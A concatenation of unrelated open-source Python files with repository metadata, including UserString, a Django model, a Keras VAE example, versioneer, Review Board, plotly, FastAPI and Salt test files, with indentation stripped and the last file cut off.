__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
return self.data.startswith(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are immutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
from UserString and than forget thereby to remove (override) the
__hash__ method inherited from ^UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-2.1/Lib/UserString.py
|
Python
|
mit
| 7,530
| 0.00571
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
address = models.CharField(blank=True)
latitude = models.DecimalField(max_digits=10, decimal_places=6)
longitude = models.DecimalField(max_digits=10, decimal_places=6)
created = models.DateTimeField(auto_add_now=True, editable=False)
updated = models.DateTimeField(auto_add=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self):
return reverse('location-detail', args=[str(self.id)])
def __str__(self):
return '{id: %d, latitude: %d, longitude: %d}' % (
self.id,
self.latitude,
self.longitude
)
class Meta:
app_label = 'locations'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
|
derrickyoo/serve-tucson
|
serve_tucson/locations/models.py
|
Python
|
bsd-3-clause
| 956
| 0
|
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
vae.compile(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
|
baojianzhou/DLReadingGroup
|
keras/examples/variational_autoencoder_deconv.py
|
Python
|
apache-2.0
| 7,159
| 0.000698
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.17 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
wheeler-microfluidics/dmf_control_board_plugin
|
_version.py
|
Python
|
bsd-3-clause
| 18,441
| 0
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
A capabilties_id attribute passed in, and can only be registerd once.
A KeyError will be thrown if attempting to register a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
if capabilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
% capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously registered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
|
KnowNo/reviewboard
|
reviewboard/webapi/server_info.py
|
Python
|
mit
| 3,158
| 0
|
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="valueminus", parent_name="scatter3d.error_z", **kwargs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "info"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatter3d/error_z/_valueminus.py
|
Python
|
mit
| 512
| 0.001953
|
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_TOP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import web
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
|
rmk135/objects
|
tests/unit/wiring/test_wiringfastapi_py36.py
|
Python
|
bsd-3-clause
| 1,426
| 0.004208
|
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
class {{module_name|capitalize}}TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
|
saltstack/salt
|
templates/test_state/tests/unit/states/test_{{module_name}}.py
|
Python
|
apache-2.0
| 590
| 0.015254
|
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
Vhost zero copy test
